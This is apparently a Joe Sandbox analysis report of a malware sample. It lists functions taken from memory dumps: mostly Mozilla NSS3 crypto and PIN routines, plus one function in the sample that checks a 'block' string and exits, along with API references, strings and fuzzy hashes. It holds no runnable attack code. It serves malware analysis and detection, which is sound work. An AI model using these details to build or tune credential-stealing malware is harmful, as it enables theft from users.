PR_LogPrint.NSS3(?,00000000), ref: 6C622F79
PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6C622F9A
PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6C622FB5
PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6C622FCE
PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6C622FE7

Strings

pNewPin = 0x%p, xrefs: 6C622FC9
pOldPin = 0x%p, xrefs: 6C622F95
C_SetPIN, xrefs: 6C622F21
hSession = 0x%x, xrefs: 6C622F3E, 6C622F4E
(CK_INVALID_HANDLE), xrefs: 6C622F5C
npl, xrefs: 6C622FFF, 6C623030
ulOldLen = %d, xrefs: 6C622FB0
ulNewLen = %d, xrefs: 6C622FE2

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN$npl
API String ID: 1003633598-3153339023
Opcode ID: 675e2e7c4ac2125506d539d8dcead80bc91c72cb042211b92ce39e26a2c6a8ad
Instruction ID: 3f5778990f8a84738ce26bbad57529d58b688fa1b13f48b692801c9747b5c593
Opcode Fuzzy Hash: 675e2e7c4ac2125506d539d8dcead80bc91c72cb042211b92ce39e26a2c6a8ad
Instruction Fuzzy Hash: 13310471A01144AFDB109F54DE4CE8B7BB1EB4636DF884035E808A7B11DF349948CFA6

Function 6C648E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C648E01,00000000,6C649060,6C750B64), ref: 6C648E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C648E01,00000000,6C649060,6C750B64), ref: 6C648E9E
PORT_ArenaAlloc_Util.NSS3(6C750B64,00000001,?,?,?,?,6C648E01,00000000,6C649060,6C750B64), ref: 6C648EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C648E01,00000000,6C649060,6C750B64), ref: 6C648EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C648E01,00000000,6C649060,6C750B64), ref: 6C648ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C648E01,00000000,6C649060,6C750B64), ref: 6C648EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C648E01), ref: 6C648EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C750B64,6C750B64), ref: 6C648F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C648F3F

Part of subcall function 6C64A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C64A421,00000000,00000000,6C649826), ref: 6C64A136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C64904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C648E76

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: 3804756a5ee3027b05f8a84ea9847ad8282efdc1fcf10f02b3a1eac8e3a33f6b
Instruction ID: c4686e2ce7fcb97e41227f1da896d1b3971046896e700fd237313f51b6896670
Opcode Fuzzy Hash: 3804756a5ee3027b05f8a84ea9847ad8282efdc1fcf10f02b3a1eac8e3a33f6b
Instruction Fuzzy Hash: 4961A0B5E002099BDB10CF65CD84AABB7B9EF89359F14C528DC18A7710E732E915CBE4

Function 6C5F8E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5F8E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C5F8E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C5F8EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C7218D0,?), ref: 6C5F8F03
PR_CallOnce.NSS3(6C752AA4,6C6512D0), ref: 6C5F8F19
PL_FreeArenaPool.NSS3(?), ref: 6C5F8F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C5F8F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C5F8F65
PL_FinishArenaPool.NSS3(?), ref: 6C5F8FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6C5F8FFE
PR_CallOnce.NSS3(6C752AA4,6C6512D0), ref: 6C5F9012
PL_FreeArenaPool.NSS3(?), ref: 6C5F9024
PL_FinishArenaPool.NSS3(?), ref: 6C5F902C
PORT_DestroyCheapArena.NSS3(?), ref: 6C5F903E

Strings

security, xrefs: 6C5F8EE7

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: 494b683b7691894ed9843c9f3735dcec25ef796c6f1addf393a9c1ee8fc12045
Instruction ID: 173f4aca4c2cba676e9af906d8ec5ab511840be79d02330a5a91454a71754d9b
Opcode Fuzzy Hash: 494b683b7691894ed9843c9f3735dcec25ef796c6f1addf393a9c1ee8fc12045
Instruction Fuzzy Hash: 3E5147B1508200AFE7149E16DC41FAB73E8AF8775CF94082AF96597B40E731D90ACB67

Function 6C6BCD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C6BCC7B), ref: 6C6BCD7A

Part of subcall function 6C6BCE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C62C1A8,?), ref: 6C6BCE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C6BCDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C6BCDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6C6BCDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C6BCD8E

Part of subcall function 6C5E05C0: PR_EnterMonitor.NSS3 ref: 6C5E05D1
Part of subcall function 6C5E05C0: PR_ExitMonitor.NSS3 ref: 6C5E05EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6C6BCDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C6BCDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C6BCE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C6BCE29
PR_UnloadLibrary.NSS3(00000000), ref: 6C6BCE48

Strings

getaddrinfo, xrefs: 6C6BCD88, 6C6BCDF9
getnameinfo, xrefs: 6C6BCDB2, 6C6BCE23
wship6.dll, xrefs: 6C6BCDE3
ws2_32.dll, xrefs: 6C6BCD75
freeaddrinfo, xrefs: 6C6BCD9F, 6C6BCE10

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: 3d8b948cef869b528e98ca4d8a4e54b58ccfc86fb1daf8cd92b283cf9fe7a3a6
Instruction ID: 429c99ffc882123e4137e8c3a44493d6282a34dc372dc5555453c830e98d5a2f
Opcode Fuzzy Hash: 3d8b948cef869b528e98ca4d8a4e54b58ccfc86fb1daf8cd92b283cf9fe7a3a6
Instruction Fuzzy Hash: 96110DB5E03111A7E7006B712C4059B3998DB8210DF54453AE80BE1F41FF35DB19C7E6

Function 6C660C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(*,fl), ref: 6C660C81

Part of subcall function 6C64BE30: SECOID_FindOID_Util.NSS3(6C60311B,00000000,?,6C60311B,?), ref: 6C64BE44

Part of subcall function 6C638500: SECOID_GetAlgorithmTag_Util.NSS3(6C6395DC,00000000,00000000,00000000,?,6C6395DC,00000000,00000000,?,6C617F4A,00000000,?,00000000,00000000), ref: 6C638517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C660CC4

Part of subcall function 6C64FAB0: free.MOZGLUE(?,-00000001,?,?,6C5EF673,00000000,00000000), ref: 6C64FAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C660CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C660D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C660D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C660D7D
free.MOZGLUE(00000000), ref: 6C660DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C660DC1
free.MOZGLUE(00000000), ref: 6C660DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C660E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C660E0F

Part of subcall function 6C6395C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C617F4A,00000000,?,00000000,00000000), ref: 6C6395E0
Part of subcall function 6C6395C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C617F4A,00000000,?,00000000,00000000), ref: 6C6395F5
Part of subcall function 6C6395C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C639609
Part of subcall function 6C6395C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C63961D
Part of subcall function 6C6395C0: PK11_GetInternalSlot.NSS3 ref: 6C63970B
Part of subcall function 6C6395C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C639756
Part of subcall function 6C6395C0: PK11_GetIVLength.NSS3(?), ref: 6C639767
Part of subcall function 6C6395C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C63977E
Part of subcall function 6C6395C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C63978E

Strings

*,fl, xrefs: 6C660DCC
-$fl, xrefs: 6C660C64
*,fl, xrefs: 6C660C69, 6C660DE0, 6C660C80, 6C660C8B, 6C660CAF

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID: *,fl$*,fl$-$fl
API String ID: 3136566230-1016299428
Opcode ID: 8da10fd53e3cfa5216d347b5a43cad497d168f53f9439bc3de63fdd0bd74896b
Instruction ID: 7a73995e999bc62a95357d70d800465e1365486ec5471a00d549719c948c52eb
Opcode Fuzzy Hash: 8da10fd53e3cfa5216d347b5a43cad497d168f53f9439bc3de63fdd0bd74896b
Instruction Fuzzy Hash: CD41D0B1900245ABEB009F65DC41BEF76B8AF0230CF104534E91967B41EB35AA58CBEE

Function 6C656CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C721DE0,?), ref: 6C656CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C656D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C656D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C656D82
DER_GetInteger_Util.NSS3(?), ref: 6C656DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C656DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C656E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C656F19
PK11_DigestBegin.NSS3(00000000), ref: 6C656F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C656F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C657011
PK11_FreeSymKey.NSS3(00000000), ref: 6C657033
free.MOZGLUE(?), ref: 6C65703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C657060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C657087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C6570AF

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 2790c367a1cf84dffcf1d0c84b8910f2b54d75d0c504ad29a3ecfefdbcf41f40
Instruction ID: bbfdb28f0fdb7e9e37332747007f686ca4be6d8cd546d829ccc143f79178c78b
Opcode Fuzzy Hash: 2790c367a1cf84dffcf1d0c84b8910f2b54d75d0c504ad29a3ecfefdbcf41f40
Instruction Fuzzy Hash: 4EA13AB1A192009BEB008F24DC45B9B32E1DB8131CFB48A39E959CBB81E775D865C75F

Function 6C61AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C5FAB95,00000000,?,00000000,00000000,00000000), ref: 6C61AF25
EnterCriticalSection.KERNEL32(?,?,?,?,6C5FAB95,00000000,?,00000000,00000000,00000000), ref: 6C61AF39
PR_Unlock.NSS3(?,?,?,6C5FAB95,00000000,?,00000000,00000000,00000000), ref: 6C61AF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C5FAB95,00000000,?,00000000,00000000,00000000), ref: 6C61AF69
TlsGetValue.KERNEL32 ref: 6C61B06B
EnterCriticalSection.KERNEL32(?), ref: 6C61B083
PR_Unlock.NSS3(?), ref: 6C61B0A4
TlsGetValue.KERNEL32 ref: 6C61B0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6C61B0D9
PR_Unlock.NSS3 ref: 6C61B102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C61B151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C61B182

Part of subcall function 6C64FAB0: free.MOZGLUE(?,-00000001,?,?,6C5EF673,00000000,00000000), ref: 6C64FAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C61B177

Part of subcall function 6C69C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C69C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C5FAB95,00000000,?,00000000,00000000,00000000), ref: 6C61B1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6C5FAB95,00000000,?,00000000,00000000,00000000), ref: 6C61B1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C5FAB95,00000000,?,00000000,00000000,00000000), ref: 6C61B1C2

Part of subcall function 6C641560: TlsGetValue.KERNEL32(00000000,?,6C610844,?), ref: 6C64157A
Part of subcall function 6C641560: EnterCriticalSection.KERNEL32(?,?,?,6C610844,?), ref: 6C64158F
Part of subcall function 6C641560: PR_Unlock.NSS3(?,?,?,?,6C610844,?), ref: 6C6415B2

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: fd357a4f12e8b734eb1f8644b82b76a1d6658067bab97b03f10fda81950fb894
Instruction ID: 7ab78d2275a51210d642eaa47239a6ea6ea36b0bddad18b45661c80865500a37
Opcode Fuzzy Hash: fd357a4f12e8b734eb1f8644b82b76a1d6658067bab97b03f10fda81950fb894
Instruction Fuzzy Hash: FBA1E3B1E00205AFEF009F68DC41BEA77B4EF49319F104035E905A7B52EB31D959CBA9

Function 6C612C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(#?al,?,6C60E477,?,?,?,00000001,00000000,?,?,6C613F23,?), ref: 6C612C62
EnterCriticalSection.KERNEL32(0000001C,?,6C60E477,?,?,?,00000001,00000000,?,?,6C613F23,?), ref: 6C612C76
PL_HashTableLookup.NSS3(00000000,?,?,6C60E477,?,?,?,00000001,00000000,?,?,6C613F23,?), ref: 6C612C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C60E477,?,?,?,00000001,00000000,?,?,6C613F23,?), ref: 6C612C93

Part of subcall function 6C69DD70: TlsGetValue.KERNEL32 ref: 6C69DD8C
Part of subcall function 6C69DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C69DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C60E477,?,?,?,00000001,00000000,?,?,6C613F23,?), ref: 6C612CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C60E477,?,?,?,00000001,00000000,?,?,6C613F23,?), ref: 6C612CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C60E477,?,?,?,00000001,00000000,?,?,6C613F23), ref: 6C612CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C60E477,?,?,?,00000001,00000000,?), ref: 6C612CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C60E477,?,?,?,00000001,00000000,?), ref: 6C612D4D
EnterCriticalSection.KERNEL32(?), ref: 6C612D61
PL_HashTableLookup.NSS3(?,?), ref: 6C612D71
PR_Unlock.NSS3(?), ref: 6C612D7E

Part of subcall function 6C5E07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C57204A), ref: 6C5E07AD
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C57204A), ref: 6C5E07CD
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C57204A), ref: 6C5E07D6
Part of subcall function 6C5E07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C57204A), ref: 6C5E07E4
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,6C57204A), ref: 6C5E0864
Part of subcall function 6C5E07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C5E0880
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,?,6C57204A), ref: 6C5E08CB
Part of subcall function 6C5E07A0: TlsGetValue.KERNEL32(?,?,6C57204A), ref: 6C5E08D7
Part of subcall function 6C5E07A0: TlsGetValue.KERNEL32(?,?,6C57204A), ref: 6C5E08FB

Strings

#?al, xrefs: 6C612C43

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID: #?al
API String ID: 2446853827-2216037108
Opcode ID: 7d4ec32b8abffb5b1f79f5e1156f806c6d871dfc99299287dc377ebb2381445e
Instruction ID: 9ceb54a1dfe5a13939bd73d270efc1b9b4c136a27e03bd69756a4d675b473a8f
Opcode Fuzzy Hash: 7d4ec32b8abffb5b1f79f5e1156f806c6d871dfc99299287dc377ebb2381445e
Instruction Fuzzy Hash: A151C5B6D00105ABDB00AF28DC4589AB7B8BF1A35DB048535ED1897B11EB31ED58C7D5

Function 00EF0AC0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 145stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 00EF0AE5
ExitProcess.KERNEL32 ref: 00EF0AF1
strtok_s.MSVCRT ref: 00EF0B08

Strings

block, xrefs: 00EF0AD7

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 6d52d080bad940dd9d405e252456fd0b6ae7610df89c02000a82ab6594d68d3a
Instruction ID: 019a442197e25ac20d0747cd8a244a597b0ee2ec670cb3e86c2302b0eca4ddb6
Opcode Fuzzy Hash: 6d52d080bad940dd9d405e252456fd0b6ae7610df89c02000a82ab6594d68d3a
Instruction Fuzzy Hash: 7A514974A4420DEFDB04DFA0DA44ABEB7B4BF54308F20A159E602B7281D770AA54CB66

Function 6C6CA4C0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 145COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C6CA4E6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C6CA4F9
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6CA553
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C6CA5AC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6CA5F7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6CA60C
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000110E1,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6CA633
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6CA671
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C6CA69A

Strings

database corruption, xrefs: 6C6CA627
%s at line %d of [%.10s], xrefs: 6C6CA62C
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6CA61D, 6C6CA68B, 6C6CA6B3

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
